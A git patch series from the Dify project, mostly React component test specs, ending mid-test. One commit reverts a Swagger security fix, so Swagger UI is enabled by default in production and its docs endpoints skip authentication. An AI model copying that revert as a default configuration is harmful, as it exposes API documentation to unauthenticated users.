+ renderComponent({ description: '' }) + + // Assert + expect(screen.getByText('Test Title')).toBeInTheDocument() + }) + + it('should handle undefined subtitle gracefully', () => { + // Arrange & Act + renderComponent({ subtitle: undefined }) + + // Assert + expect(screen.getByText('Test Title')).toBeInTheDocument() + }) + + it('should handle empty string subtitle', () => { + // Arrange & Act + renderComponent({ subtitle: '' }) + + // Assert + // Empty subtitle should still render but be empty + expect(screen.getByText('Test Title')).toBeInTheDocument() + }) + + it('should handle null subtitle', () => { + // Arrange & Act + renderComponent({ subtitle: null }) + + // Assert + expect(screen.getByText('Test Title')).toBeInTheDocument() + }) + + it('should render with subtitle containing special characters', () => { + // Arrange + const specialSubtitle = '(optional) - [Beta]' + + // Act + renderComponent({ subtitle: specialSubtitle }) + + // Assert + expect(screen.getByText(specialSubtitle)).toBeInTheDocument() + }) + + it('should render with title and subtitle together', () => { + // Arrange & Act + const { container } = renderComponent({ + title: 'Main Title', + subtitle: 'Secondary Text', + }) + + // Assert + expect(screen.getByText('Main Title')).toBeInTheDocument() + expect(screen.getByText('Secondary Text')).toBeInTheDocument() + + // Both should be in the same heading element + const heading = container.querySelector('h3') + expect(heading).toHaveTextContent('Main Title') + expect(heading).toHaveTextContent('Secondary Text') + }) + }) + + // Accessibility Tests + describe('Accessibility', () => { + it('should have semantic heading structure', () => { + // Arrange & Act + const { container } = renderComponent() + + // Assert + const heading = container.querySelector('h3') + expect(heading).toBeInTheDocument() + expect(heading).toHaveTextContent('Test Title') + }) + + it('should have semantic paragraph for description', () => { + // Arrange & Act + const { container } = renderComponent() + + // Assert + const paragraph = container.querySelector('p') + expect(paragraph).toBeInTheDocument() + expect(paragraph).toHaveTextContent('Test description for the option') + }) + + it('should have proper cursor style for accessibility', () => { + // Arrange & Act + const { container } = renderComponent() + + // Assert + const card = container.querySelector('.cursor-pointer') + expect(card).toBeInTheDocument() + expect(card).toHaveClass('cursor-pointer') + }) + }) + + // Additional Edge Cases + describe('Additional Edge Cases', () => { + it('should handle click when onClick handler is missing', async () => { + // Arrange + const user = userEvent.setup() + renderComponent({ onClick: undefined }) + + // Act & Assert - Should not throw error + const card = screen.getByText('Test Title').closest('div[class*="cursor-pointer"]') + await expect(user.click(card!)).resolves.not.toThrow() + }) + }) +}) diff --git a/web/app/components/workflow-app/components/workflow-onboarding-modal/start-node-selection-panel.spec.tsx b/web/app/components/workflow-app/components/workflow-onboarding-modal/start-node-selection-panel.spec.tsx new file mode 100644 index 0000000000..5612d4e423 --- /dev/null +++ b/web/app/components/workflow-app/components/workflow-onboarding-modal/start-node-selection-panel.spec.tsx @@ -0,0 +1,586 @@ +import React from 'react' +import { render, screen, waitFor } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import StartNodeSelectionPanel from './start-node-selection-panel' +import { BlockEnum } from '@/app/components/workflow/types' + +// Mock NodeSelector component +jest.mock('@/app/components/workflow/block-selector', () => { + return function MockNodeSelector({ + open, + onOpenChange, + onSelect, + trigger, + }: any) { + // trigger is a function that returns a React element + const triggerElement = typeof trigger === 'function' ? trigger() : trigger + + return ( +
+ {triggerElement} + {open && ( +
+ + + +
+ )} +
+ ) + } +}) + +// Mock icons +jest.mock('@/app/components/base/icons/src/vender/workflow', () => ({ + Home: () =>
Home
, + TriggerAll: () =>
TriggerAll
, +})) + +describe('StartNodeSelectionPanel', () => { + const mockOnSelectUserInput = jest.fn() + const mockOnSelectTrigger = jest.fn() + + const defaultProps = { + onSelectUserInput: mockOnSelectUserInput, + onSelectTrigger: mockOnSelectTrigger, + } + + beforeEach(() => { + jest.clearAllMocks() + }) + + // Helper function to render component + const renderComponent = (props = {}) => { + return render() + } + + // Rendering tests (REQUIRED) + describe('Rendering', () => { + it('should render without crashing', () => { + // Arrange & Act + renderComponent() + + // Assert + expect(screen.getByText('workflow.onboarding.userInputFull')).toBeInTheDocument() + }) + + it('should render user input option', () => { + // Arrange & Act + renderComponent() + + // Assert + expect(screen.getByText('workflow.onboarding.userInputFull')).toBeInTheDocument() + expect(screen.getByText('workflow.onboarding.userInputDescription')).toBeInTheDocument() + expect(screen.getByTestId('home-icon')).toBeInTheDocument() + }) + + it('should render trigger option', () => { + // Arrange & Act + renderComponent() + + // Assert + expect(screen.getByText('workflow.onboarding.trigger')).toBeInTheDocument() + expect(screen.getByText('workflow.onboarding.triggerDescription')).toBeInTheDocument() + expect(screen.getByTestId('trigger-all-icon')).toBeInTheDocument() + }) + + it('should render node selector component', () => { + // Arrange & Act + renderComponent() + + // Assert + expect(screen.getByTestId('node-selector')).toBeInTheDocument() + }) + + it('should have correct grid layout', () => { + // Arrange & Act + const { container } = renderComponent() + + // Assert + const grid = container.querySelector('.grid') + expect(grid).toBeInTheDocument() + expect(grid).toHaveClass('grid-cols-2') + expect(grid).toHaveClass('gap-4') + }) + + it('should not show trigger selector initially', () => { + // Arrange & Act + renderComponent() + + // Assert + expect(screen.queryByTestId('node-selector-content')).not.toBeInTheDocument() + }) + }) + + // Props tests (REQUIRED) + describe('Props', () => { + it('should accept onSelectUserInput prop', () => { + // Arrange + const customHandler = jest.fn() + + // Act + renderComponent({ onSelectUserInput: customHandler }) + + // Assert + expect(screen.getByText('workflow.onboarding.userInputFull')).toBeInTheDocument() + }) + + it('should accept onSelectTrigger prop', () => { + // Arrange + const customHandler = jest.fn() + + // Act + renderComponent({ onSelectTrigger: customHandler }) + + // Assert + expect(screen.getByText('workflow.onboarding.trigger')).toBeInTheDocument() + }) + + it('should handle missing onSelectUserInput gracefully', () => { + // Arrange & Act + expect(() => { + renderComponent({ onSelectUserInput: undefined }) + }).not.toThrow() + + // Assert + expect(screen.getByText('workflow.onboarding.userInputFull')).toBeInTheDocument() + }) + + it('should handle missing onSelectTrigger gracefully', () => { + // Arrange & Act + expect(() => { + renderComponent({ onSelectTrigger: undefined }) + }).not.toThrow() + + // Assert + expect(screen.getByText('workflow.onboarding.trigger')).toBeInTheDocument() + }) + }) + + // User Interactions - User Input Option + describe('User Interactions - User Input', () => { + it('should call onSelectUserInput when user input option is clicked', async () => { + // Arrange + const user = userEvent.setup() + renderComponent() + + // Act + const userInputOption = screen.getByText('workflow.onboarding.userInputFull') + await user.click(userInputOption) + + // Assert + expect(mockOnSelectUserInput).toHaveBeenCalledTimes(1) + }) + + it('should not call onSelectTrigger when user input option is clicked', async () => { + // Arrange + const user = userEvent.setup() + renderComponent() + + // Act + const userInputOption = screen.getByText('workflow.onboarding.userInputFull') + await user.click(userInputOption) + + // Assert + expect(mockOnSelectTrigger).not.toHaveBeenCalled() + }) + + it('should handle multiple clicks on user input option', async () => { + // Arrange + const user = userEvent.setup() + renderComponent() + + // Act + const userInputOption = screen.getByText('workflow.onboarding.userInputFull') + await user.click(userInputOption) + await user.click(userInputOption) + await user.click(userInputOption) + + // Assert + expect(mockOnSelectUserInput).toHaveBeenCalledTimes(3) + }) + }) + + // User Interactions - Trigger Option + describe('User Interactions - Trigger', () => { + it('should show trigger selector when trigger option is clicked', async () => { + // Arrange + const user = userEvent.setup() + renderComponent() + + // Act + const triggerOption = screen.getByText('workflow.onboarding.trigger') + await user.click(triggerOption) + + // Assert + await waitFor(() => { + expect(screen.getByTestId('node-selector-content')).toBeInTheDocument() + }) + }) + + it('should not call onSelectTrigger immediately when trigger option is clicked', async () => { + // Arrange + const user = userEvent.setup() + renderComponent() + + // Act + const triggerOption = screen.getByText('workflow.onboarding.trigger') + await user.click(triggerOption) + + // Assert + expect(mockOnSelectTrigger).not.toHaveBeenCalled() + }) + + it('should call onSelectTrigger when a trigger is selected from selector', async () => { + // Arrange + const user = userEvent.setup() + renderComponent() + + // Act - Open trigger selector + const triggerOption = screen.getByText('workflow.onboarding.trigger') + await user.click(triggerOption) + + // Act - Select a trigger + await waitFor(() => { + expect(screen.getByTestId('select-schedule')).toBeInTheDocument() + }) + const scheduleButton = screen.getByTestId('select-schedule') + await user.click(scheduleButton) + + // Assert + expect(mockOnSelectTrigger).toHaveBeenCalledTimes(1) + expect(mockOnSelectTrigger).toHaveBeenCalledWith(BlockEnum.TriggerSchedule, undefined) + }) + + it('should call onSelectTrigger with correct node type for webhook', async () => { + // Arrange + const user = userEvent.setup() + renderComponent() + + // Act - Open trigger selector + const triggerOption = screen.getByText('workflow.onboarding.trigger') + await user.click(triggerOption) + + // Act - Select webhook trigger + await waitFor(() => { + expect(screen.getByTestId('select-webhook')).toBeInTheDocument() + }) + const webhookButton = screen.getByTestId('select-webhook') + await user.click(webhookButton) + + // Assert + expect(mockOnSelectTrigger).toHaveBeenCalledTimes(1) + expect(mockOnSelectTrigger).toHaveBeenCalledWith(BlockEnum.TriggerWebhook, undefined) + }) + + it('should hide trigger selector after selection', async () => { + // Arrange + const user = userEvent.setup() + renderComponent() + + // Act - Open trigger selector + const triggerOption = screen.getByText('workflow.onboarding.trigger') + await user.click(triggerOption) + + // Act - Select a trigger + await waitFor(() => { + expect(screen.getByTestId('select-schedule')).toBeInTheDocument() + }) + const scheduleButton = screen.getByTestId('select-schedule') + await user.click(scheduleButton) + + // Assert - Selector should be hidden + await waitFor(() => { + expect(screen.queryByTestId('node-selector-content')).not.toBeInTheDocument() + }) + }) + + it('should pass tool config parameter through onSelectTrigger', async () => { + // Arrange + const user = userEvent.setup() + renderComponent() + + // Act - Open trigger selector + const triggerOption = screen.getByText('workflow.onboarding.trigger') + await user.click(triggerOption) + + // Act - Select a trigger (our mock doesn't pass toolConfig, but real NodeSelector would) + await waitFor(() => { + expect(screen.getByTestId('select-schedule')).toBeInTheDocument() + }) + const scheduleButton = screen.getByTestId('select-schedule') + await user.click(scheduleButton) + + // Assert - Verify handler was called + // In real usage, NodeSelector would pass toolConfig as second parameter + expect(mockOnSelectTrigger).toHaveBeenCalled() + }) + }) + + // State Management + describe('State Management', () => { + it('should toggle trigger selector visibility', async () => { + // Arrange + const user = userEvent.setup() + renderComponent() + + // Assert - Initially hidden + expect(screen.queryByTestId('node-selector-content')).not.toBeInTheDocument() + + // Act - Show selector + const triggerOption = screen.getByText('workflow.onboarding.trigger') + await user.click(triggerOption) + + // Assert - Now visible + await waitFor(() => { + expect(screen.getByTestId('node-selector-content')).toBeInTheDocument() + }) + + // Act - Close selector + const closeButton = screen.getByTestId('close-selector') + await user.click(closeButton) + + // Assert - Hidden again + await waitFor(() => { + expect(screen.queryByTestId('node-selector-content')).not.toBeInTheDocument() + }) + }) + + it('should maintain state across user input selections', async () => { + // Arrange + const user = userEvent.setup() + renderComponent() + + // Act - Click user input multiple times + const userInputOption = screen.getByText('workflow.onboarding.userInputFull') + await user.click(userInputOption) + await user.click(userInputOption) + + // Assert - Trigger selector should remain hidden + expect(screen.queryByTestId('node-selector-content')).not.toBeInTheDocument() + }) + + it('should reset trigger selector visibility after selection', async () => { + // Arrange + const user = userEvent.setup() + renderComponent() + + // Act - Open and select trigger + const triggerOption = screen.getByText('workflow.onboarding.trigger') + await user.click(triggerOption) + + await waitFor(() => { + expect(screen.getByTestId('select-schedule')).toBeInTheDocument() + }) + const scheduleButton = screen.getByTestId('select-schedule') + await user.click(scheduleButton) + + // Assert - Selector should be closed + await waitFor(() => { + expect(screen.queryByTestId('node-selector-content')).not.toBeInTheDocument() + }) + + // Act - Click trigger option again + await user.click(triggerOption) + + // Assert - Selector should open again + await waitFor(() => { + expect(screen.getByTestId('node-selector-content')).toBeInTheDocument() + }) + }) + }) + + // Edge Cases (REQUIRED) + describe('Edge Cases', () => { + it('should handle rapid clicks on trigger option', async () => { + // Arrange + const user = userEvent.setup() + renderComponent() + + // Act + const triggerOption = screen.getByText('workflow.onboarding.trigger') + await user.click(triggerOption) + await user.click(triggerOption) + await user.click(triggerOption) + + // Assert - Should still be open (last click) + await waitFor(() => { + expect(screen.getByTestId('node-selector-content')).toBeInTheDocument() + }) + }) + + it('should handle selecting different trigger types in sequence', async () => { + // Arrange + const user = userEvent.setup() + renderComponent() + + // Act - Open and select schedule + const triggerOption = screen.getByText('workflow.onboarding.trigger') + await user.click(triggerOption) + + await waitFor(() => { + expect(screen.getByTestId('select-schedule')).toBeInTheDocument() + }) + await user.click(screen.getByTestId('select-schedule')) + + // Assert + expect(mockOnSelectTrigger).toHaveBeenNthCalledWith(1, BlockEnum.TriggerSchedule, undefined) + + // Act - Open again and select webhook + await user.click(triggerOption) + await waitFor(() => { + expect(screen.getByTestId('select-webhook')).toBeInTheDocument() + }) + await user.click(screen.getByTestId('select-webhook')) + + // Assert + expect(mockOnSelectTrigger).toHaveBeenNthCalledWith(2, BlockEnum.TriggerWebhook, undefined) + expect(mockOnSelectTrigger).toHaveBeenCalledTimes(2) + }) + + it('should not crash with undefined callbacks', async () => { + // Arrange + const user = userEvent.setup() + renderComponent({ + onSelectUserInput: undefined, + onSelectTrigger: undefined, + }) + + // Act & Assert - Should not throw + const userInputOption = screen.getByText('workflow.onboarding.userInputFull') + await expect(user.click(userInputOption)).resolves.not.toThrow() + }) + + it('should handle opening and closing selector without selection', async () => { + // Arrange + const user = userEvent.setup() + renderComponent() + + // Act - Open selector + const triggerOption = screen.getByText('workflow.onboarding.trigger') + await user.click(triggerOption) + + // Act - Close without selecting + await waitFor(() => { + expect(screen.getByTestId('close-selector')).toBeInTheDocument() + }) + await user.click(screen.getByTestId('close-selector')) + + // Assert - No selection callback should be called + expect(mockOnSelectTrigger).not.toHaveBeenCalled() + + // Assert - Selector should be closed + await waitFor(() => { + expect(screen.queryByTestId('node-selector-content')).not.toBeInTheDocument() + }) + }) + }) + + // Accessibility Tests + describe('Accessibility', () => { + it('should have both options visible and accessible', () => { + // Arrange & Act + renderComponent() + + // Assert + expect(screen.getByText('workflow.onboarding.userInputFull')).toBeVisible() + expect(screen.getByText('workflow.onboarding.trigger')).toBeVisible() + }) + + it('should have descriptive text for both options', () => { + // Arrange & Act + renderComponent() + + // Assert + expect(screen.getByText('workflow.onboarding.userInputDescription')).toBeInTheDocument() + expect(screen.getByText('workflow.onboarding.triggerDescription')).toBeInTheDocument() + }) + + it('should have icons for visual identification', () => { + // Arrange & Act + renderComponent() + + // Assert + expect(screen.getByTestId('home-icon')).toBeInTheDocument() + expect(screen.getByTestId('trigger-all-icon')).toBeInTheDocument() + }) + + it('should maintain focus after interactions', async () => { + // Arrange + const user = userEvent.setup() + renderComponent() + + // Act + const userInputOption = screen.getByText('workflow.onboarding.userInputFull') + await user.click(userInputOption) + + // Assert - Component should still be in document + expect(screen.getByText('workflow.onboarding.userInputFull')).toBeInTheDocument() + expect(screen.getByText('workflow.onboarding.trigger')).toBeInTheDocument() + }) + }) + + // Integration Tests + describe('Integration', () => { + it('should coordinate between both options correctly', async () => { + // Arrange + const user = userEvent.setup() + renderComponent() + + // Act - Click user input + const userInputOption = screen.getByText('workflow.onboarding.userInputFull') + await user.click(userInputOption) + + // Assert + expect(mockOnSelectUserInput).toHaveBeenCalledTimes(1) + expect(mockOnSelectTrigger).not.toHaveBeenCalled() + + // Act - Click trigger + const triggerOption = screen.getByText('workflow.onboarding.trigger') + await user.click(triggerOption) + + // Assert - Trigger selector should open + await waitFor(() => { + expect(screen.getByTestId('node-selector-content')).toBeInTheDocument() + }) + + // Act - Select trigger + await user.click(screen.getByTestId('select-schedule')) + + // Assert + expect(mockOnSelectTrigger).toHaveBeenCalledTimes(1) + expect(mockOnSelectUserInput).toHaveBeenCalledTimes(1) + }) + + it('should render all components in correct hierarchy', () => { + // Arrange & Act + const { container } = renderComponent() + + // Assert + const grid = container.querySelector('.grid') + expect(grid).toBeInTheDocument() + + // Both StartNodeOption components should be rendered + expect(screen.getByText('workflow.onboarding.userInputFull')).toBeInTheDocument() + expect(screen.getByText('workflow.onboarding.trigger')).toBeInTheDocument() + + // NodeSelector should be rendered + expect(screen.getByTestId('node-selector')).toBeInTheDocument() + }) + }) +}) From a915b8a584e8c51851e81e20551dd0c03fb56bb6 Mon Sep 17 00:00:00 2001 From: crazywoola <100913391+crazywoola@users.noreply.github.com> Date: Tue, 16 Dec 2025 14:19:33 +0800 Subject: [PATCH 23/27] revert: "security/fix-swagger-info-leak-m02" (#29721) --- api/.env.example | 12 +----------- api/configs/feature/__init__.py | 33 +++------------------------------ api/extensions/ext_login.py | 4 ++-- api/libs/external_api.py | 20 ++------------------ 4 files changed, 8 insertions(+), 61 deletions(-) diff --git a/api/.env.example b/api/.env.example index 8c4ea617d4..ace4c4ea1b 100644 --- a/api/.env.example +++ b/api/.env.example @@ -626,17 +626,7 @@ QUEUE_MONITOR_ALERT_EMAILS= QUEUE_MONITOR_INTERVAL=30 # Swagger UI configuration -# SECURITY: Swagger UI is automatically disabled in PRODUCTION environment (DEPLOY_ENV=PRODUCTION) -# to prevent API information disclosure. -# -# Behavior: -# - DEPLOY_ENV=PRODUCTION + SWAGGER_UI_ENABLED not set -> Swagger DISABLED (secure default) -# - DEPLOY_ENV=DEVELOPMENT/TESTING + SWAGGER_UI_ENABLED not set -> Swagger ENABLED -# - SWAGGER_UI_ENABLED=true -> Swagger ENABLED (overrides environment check) -# - SWAGGER_UI_ENABLED=false -> Swagger DISABLED (explicit disable) -# -# For development, you can uncomment below or set DEPLOY_ENV=DEVELOPMENT -# SWAGGER_UI_ENABLED=false +SWAGGER_UI_ENABLED=true SWAGGER_UI_PATH=/swagger-ui.html # Whether to encrypt dataset IDs when exporting DSL files (default: true) diff --git a/api/configs/feature/__init__.py b/api/configs/feature/__init__.py index b9091b5e2f..e16ca52f46 100644 --- a/api/configs/feature/__init__.py +++ b/api/configs/feature/__init__.py @@ -1252,19 +1252,9 @@ class WorkflowLogConfig(BaseSettings): class SwaggerUIConfig(BaseSettings): - """ - Configuration for Swagger UI documentation. - - Security Note: Swagger UI is automatically disabled in PRODUCTION environment - to prevent API information disclosure. Set SWAGGER_UI_ENABLED=true explicitly - to enable in production if needed. - """ - - SWAGGER_UI_ENABLED: bool | None = Field( - description="Whether to enable Swagger UI in api module. " - "Automatically disabled in PRODUCTION environment for security. " - "Set to true explicitly to enable in production.", - default=None, + SWAGGER_UI_ENABLED: bool = Field( + description="Whether to enable Swagger UI in api module", + default=True, ) SWAGGER_UI_PATH: str = Field( @@ -1272,23 +1262,6 @@ class SwaggerUIConfig(BaseSettings): default="/swagger-ui.html", ) - @property - def swagger_ui_enabled(self) -> bool: - """ - Compute whether Swagger UI should be enabled. - - If SWAGGER_UI_ENABLED is explicitly set, use that value. - Otherwise, disable in PRODUCTION environment for security. - """ - if self.SWAGGER_UI_ENABLED is not None: - return self.SWAGGER_UI_ENABLED - - # Auto-disable in production environment - import os - - deploy_env = os.environ.get("DEPLOY_ENV", "PRODUCTION") - return deploy_env.upper() != "PRODUCTION" - class TenantIsolatedTaskQueueConfig(BaseSettings): TENANT_ISOLATED_TASK_CONCURRENCY: int = Field( diff --git a/api/extensions/ext_login.py b/api/extensions/ext_login.py index 5cbdd4db12..74299956c0 100644 --- a/api/extensions/ext_login.py +++ b/api/extensions/ext_login.py @@ -22,8 +22,8 @@ login_manager = flask_login.LoginManager() @login_manager.request_loader def load_user_from_request(request_from_flask_login): """Load user based on the request.""" - # Skip authentication for documentation endpoints (only when Swagger is enabled) - if dify_config.swagger_ui_enabled and request.path.endswith((dify_config.SWAGGER_UI_PATH, "/swagger.json")): + # Skip authentication for documentation endpoints + if dify_config.SWAGGER_UI_ENABLED and request.path.endswith((dify_config.SWAGGER_UI_PATH, "/swagger.json")): return None auth_token = extract_access_token(request) diff --git a/api/libs/external_api.py b/api/libs/external_api.py index 31ca2b3e08..61a90ee4a9 100644 --- a/api/libs/external_api.py +++ b/api/libs/external_api.py @@ -131,28 +131,12 @@ class ExternalApi(Api): } def __init__(self, app: Blueprint | Flask, *args, **kwargs): - import logging - import os - kwargs.setdefault("authorizations", self._authorizations) kwargs.setdefault("security", "Bearer") - - # Security: Use computed swagger_ui_enabled which respects DEPLOY_ENV - swagger_enabled = dify_config.swagger_ui_enabled - kwargs["add_specs"] = swagger_enabled - kwargs["doc"] = dify_config.SWAGGER_UI_PATH if swagger_enabled else False + kwargs["add_specs"] = dify_config.SWAGGER_UI_ENABLED + kwargs["doc"] = dify_config.SWAGGER_UI_PATH if dify_config.SWAGGER_UI_ENABLED else False # manual separate call on construction and init_app to ensure configs in kwargs effective super().__init__(app=None, *args, **kwargs) self.init_app(app, **kwargs) register_external_error_handlers(self) - - # Security: Log warning when Swagger is enabled in production environment - deploy_env = os.environ.get("DEPLOY_ENV", "PRODUCTION") - if swagger_enabled and deploy_env.upper() == "PRODUCTION": - logger = logging.getLogger(__name__) - logger.warning( - "SECURITY WARNING: Swagger UI is ENABLED in PRODUCTION environment. " - "This may expose sensitive API documentation. " - "Set SWAGGER_UI_ENABLED=false or remove the explicit setting to disable." - ) From 240e1d155ae00ad0c8f9236d2a1285b7b4b0ad85 Mon Sep 17 00:00:00 2001 From: yyh <92089059+lyzno1@users.noreply.github.com> Date: Tue, 16 Dec 2025 14:21:05 +0800 Subject: [PATCH 24/27] test: add comprehensive tests for CustomizeModal component (#29709) --- web/AGENTS.md | 1 + web/CLAUDE.md | 1 + web/app/components/app/overview/app-card.tsx | 1 - .../app/overview/customize/index.spec.tsx | 434 ++++++++++++++++++ .../app/overview/customize/index.tsx | 1 - 5 files changed, 436 insertions(+), 2 deletions(-) create mode 120000 web/CLAUDE.md create mode 100644 web/app/components/app/overview/customize/index.spec.tsx diff --git a/web/AGENTS.md b/web/AGENTS.md index 70e251b738..7362cd51db 100644 --- a/web/AGENTS.md +++ b/web/AGENTS.md @@ -2,3 +2,4 @@ - Use `web/testing/testing.md` as the canonical instruction set for generating frontend automated tests. - When proposing or saving tests, re-read that document and follow every requirement. +- All frontend tests MUST also comply with the `frontend-testing` skill. Treat the skill as a mandatory constraint, not optional guidance. diff --git a/web/CLAUDE.md b/web/CLAUDE.md new file mode 120000 index 0000000000..47dc3e3d86 --- /dev/null +++ b/web/CLAUDE.md @@ -0,0 +1 @@ +AGENTS.md \ No newline at end of file diff --git a/web/app/components/app/overview/app-card.tsx b/web/app/components/app/overview/app-card.tsx index a0f5780b71..15762923ff 100644 --- a/web/app/components/app/overview/app-card.tsx +++ b/web/app/components/app/overview/app-card.tsx @@ -401,7 +401,6 @@ function AppCard({ /> setShowCustomizeModal(false)} appId={appInfo.id} api_base_url={appInfo.api_base_url} diff --git a/web/app/components/app/overview/customize/index.spec.tsx b/web/app/components/app/overview/customize/index.spec.tsx new file mode 100644 index 0000000000..c960101b66 --- /dev/null +++ b/web/app/components/app/overview/customize/index.spec.tsx @@ -0,0 +1,434 @@ +import { fireEvent, render, screen, waitFor } from '@testing-library/react' +import CustomizeModal from './index' +import { AppModeEnum } from '@/types/app' + +// Mock useDocLink from context +const mockDocLink = jest.fn((path?: string) => `https://docs.dify.ai/en-US${path || ''}`) +jest.mock('@/context/i18n', () => ({ + useDocLink: () => mockDocLink, +})) + +// Mock window.open +const mockWindowOpen = jest.fn() +Object.defineProperty(window, 'open', { + value: mockWindowOpen, + writable: true, +}) + +describe('CustomizeModal', () => { + const defaultProps = { + isShow: true, + onClose: jest.fn(), + api_base_url: 'https://api.example.com', + appId: 'test-app-id-123', + mode: AppModeEnum.CHAT, + } + + beforeEach(() => { + jest.clearAllMocks() + }) + + // Rendering tests - verify component renders correctly with various configurations + describe('Rendering', () => { + it('should render without crashing when isShow is true', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + await waitFor(() => { + expect(screen.getByText('appOverview.overview.appInfo.customize.title')).toBeInTheDocument() + }) + }) + + it('should not render content when isShow is false', async () => { + // Arrange + const props = { ...defaultProps, isShow: false } + + // Act + render() + + // Assert + await waitFor(() => { + expect(screen.queryByText('appOverview.overview.appInfo.customize.title')).not.toBeInTheDocument() + }) + }) + + it('should render modal description', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + await waitFor(() => { + expect(screen.getByText('appOverview.overview.appInfo.customize.explanation')).toBeInTheDocument() + }) + }) + + it('should render way 1 and way 2 tags', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + await waitFor(() => { + expect(screen.getByText('appOverview.overview.appInfo.customize.way 1')).toBeInTheDocument() + expect(screen.getByText('appOverview.overview.appInfo.customize.way 2')).toBeInTheDocument() + }) + }) + + it('should render all step numbers (1, 2, 3)', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + await waitFor(() => { + expect(screen.getByText('1')).toBeInTheDocument() + expect(screen.getByText('2')).toBeInTheDocument() + expect(screen.getByText('3')).toBeInTheDocument() + }) + }) + + it('should render step instructions', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + await waitFor(() => { + expect(screen.getByText('appOverview.overview.appInfo.customize.way1.step1')).toBeInTheDocument() + expect(screen.getByText('appOverview.overview.appInfo.customize.way1.step2')).toBeInTheDocument() + expect(screen.getByText('appOverview.overview.appInfo.customize.way1.step3')).toBeInTheDocument() + }) + }) + + it('should render environment variables with appId and api_base_url', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + await waitFor(() => { + const preElement = screen.getByText(/NEXT_PUBLIC_APP_ID/i).closest('pre') + expect(preElement).toBeInTheDocument() + expect(preElement?.textContent).toContain('NEXT_PUBLIC_APP_ID=\'test-app-id-123\'') + expect(preElement?.textContent).toContain('NEXT_PUBLIC_API_URL=\'https://api.example.com\'') + }) + }) + + it('should render GitHub icon in step 1 button', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert - find the GitHub link and verify it contains an SVG icon + await waitFor(() => { + const githubLink = screen.getByRole('link', { name: /step1Operation/i }) + expect(githubLink).toBeInTheDocument() + expect(githubLink.querySelector('svg')).toBeInTheDocument() + }) + }) + }) + + // Props tests - verify props are correctly applied + describe('Props', () => { + it('should display correct appId in environment variables', async () => { + // Arrange + const customAppId = 'custom-app-id-456' + const props = { ...defaultProps, appId: customAppId } + + // Act + render() + + // Assert + await waitFor(() => { + const preElement = screen.getByText(/NEXT_PUBLIC_APP_ID/i).closest('pre') + expect(preElement?.textContent).toContain(`NEXT_PUBLIC_APP_ID='${customAppId}'`) + }) + }) + + it('should display correct api_base_url in environment variables', async () => { + // Arrange + const customApiUrl = 'https://custom-api.example.com' + const props = { ...defaultProps, api_base_url: customApiUrl } + + // Act + render() + + // Assert + await waitFor(() => { + const preElement = screen.getByText(/NEXT_PUBLIC_API_URL/i).closest('pre') + expect(preElement?.textContent).toContain(`NEXT_PUBLIC_API_URL='${customApiUrl}'`) + }) + }) + }) + + // Mode-based conditional rendering tests - verify GitHub link changes based on app mode + describe('Mode-based GitHub link', () => { + it('should link to webapp-conversation repo for CHAT mode', async () => { + // Arrange + const props = { ...defaultProps, mode: AppModeEnum.CHAT } + + // Act + render() + + // Assert + await waitFor(() => { + const githubLink = screen.getByRole('link', { name: /step1Operation/i }) + expect(githubLink).toHaveAttribute('href', 'https://github.com/langgenius/webapp-conversation') + }) + }) + + it('should link to webapp-conversation repo for ADVANCED_CHAT mode', async () => { + // Arrange + const props = { ...defaultProps, mode: AppModeEnum.ADVANCED_CHAT } + + // Act + render() + + // Assert + await waitFor(() => { + const githubLink = screen.getByRole('link', { name: /step1Operation/i }) + expect(githubLink).toHaveAttribute('href', 'https://github.com/langgenius/webapp-conversation') + }) + }) + + it('should link to webapp-text-generator repo for COMPLETION mode', async () => { + // Arrange + const props = { ...defaultProps, mode: AppModeEnum.COMPLETION } + + // Act + render() + + // Assert + await waitFor(() => { + const githubLink = screen.getByRole('link', { name: /step1Operation/i }) + expect(githubLink).toHaveAttribute('href', 'https://github.com/langgenius/webapp-text-generator') + }) + }) + + it('should link to webapp-text-generator repo for WORKFLOW mode', async () => { + // Arrange + const props = { ...defaultProps, mode: AppModeEnum.WORKFLOW } + + // Act + render() + + // Assert + await waitFor(() => { + const githubLink = screen.getByRole('link', { name: /step1Operation/i }) + expect(githubLink).toHaveAttribute('href', 'https://github.com/langgenius/webapp-text-generator') + }) + }) + + it('should link to webapp-text-generator repo for AGENT_CHAT mode', async () => { + // Arrange + const props = { ...defaultProps, mode: AppModeEnum.AGENT_CHAT } + + // Act + render() + + // Assert + await waitFor(() => { + const githubLink = screen.getByRole('link', { name: /step1Operation/i }) + expect(githubLink).toHaveAttribute('href', 'https://github.com/langgenius/webapp-text-generator') + }) + }) + }) + + // External links tests - verify external links have correct security attributes + describe('External links', () => { + it('should have GitHub repo link that opens in new tab', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + await waitFor(() => { + const githubLink = screen.getByRole('link', { name: /step1Operation/i }) + expect(githubLink).toHaveAttribute('target', '_blank') + expect(githubLink).toHaveAttribute('rel', 'noopener noreferrer') + }) + }) + + it('should have Vercel docs link that opens in new tab', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + await waitFor(() => { + const vercelLink = screen.getByRole('link', { name: /step2Operation/i }) + expect(vercelLink).toHaveAttribute('href', 'https://vercel.com/docs/concepts/deployments/git/vercel-for-github') + expect(vercelLink).toHaveAttribute('target', '_blank') + expect(vercelLink).toHaveAttribute('rel', 'noopener noreferrer') + }) + }) + }) + + // User interactions tests - verify user actions trigger expected behaviors + describe('User Interactions', () => { + it('should call window.open with doc link when way 2 button is clicked', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + await waitFor(() => { + expect(screen.getByText('appOverview.overview.appInfo.customize.way2.operation')).toBeInTheDocument() + }) + + const way2Button = screen.getByText('appOverview.overview.appInfo.customize.way2.operation').closest('button') + expect(way2Button).toBeInTheDocument() + fireEvent.click(way2Button!) + + // Assert + expect(mockWindowOpen).toHaveBeenCalledTimes(1) + expect(mockWindowOpen).toHaveBeenCalledWith( + expect.stringContaining('/guides/application-publishing/developing-with-apis'), + '_blank', + ) + }) + + it('should call onClose when modal close button is clicked', 